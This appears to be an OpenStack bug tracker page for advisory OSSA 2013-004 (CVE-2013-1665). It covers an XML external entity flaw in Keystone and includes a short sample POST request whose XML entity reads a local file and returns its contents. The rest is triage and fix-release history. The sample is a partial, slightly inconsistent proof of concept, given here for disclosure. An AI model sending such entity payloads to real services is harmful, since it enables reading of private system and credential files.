[OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)
Bug #1100279 reported by
Thierry Carrez
This bug affects 3 people
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Identity (keystone) |
Fix Released
|
High
|
Dolph Mathews | ||
Essex |
Fix Released
|
High
|
Dolph Mathews | ||
Folsom |
Fix Released
|
High
|
Dolph Mathews | ||
OpenStack Security Advisory |
Fix Released
|
Undecided
|
Thierry Carrez |
Bug Description
Evil XML ! Jonathan Murray from NCC Group reported that you can leak local file contents using XML entities in Keystone requests:
POST /v2.0//
x-auth-token: d0e1a2d3b4e5e6f7
content-type: application/xml
<!DOCTYPE doc [ <!ENTITY eny SYSTEM "file:/
<role>
<name>&ent;</name>
</role>
just returns the content of the local file in role.name.
Looks like we should disable parsing entities altogether, they seem to be exploitable ion pretty awesome ways. I'm not sure only Keystone is affected by this.
CVE References
Changed in keystone: | |
milestone: | none → 2012.2.3 |
Changed in keystone: | |
milestone: | 2012.2.3 → none |
Changed in keystone: | |
importance: | Undecided → High |
status: | Confirmed → Triaged |
summary: |
- Local file leak through entities in XML requests + Local file leak through entities in XML requests (CVE-2013-1665) |
information type: | Private Security → Public Security |
Changed in keystone: | |
milestone: | none → grizzly-3 |
status: | Fix Committed → Fix Released |
Changed in keystone: | |
milestone: | grizzly-3 → 2013.1 |
summary: |
- Local file leak through entities in XML requests (CVE-2013-1665) + [OSSA 2013-004] Local file leak through entities in XML requests + (CVE-2013-1665) |
Changed in ossa: | |
assignee: | nobody → Thierry Carrez (ttx) |
status: | New → Fix Released |
To post a comment you must log in.
Adding Joe Heck and Dan Prince for confirmation.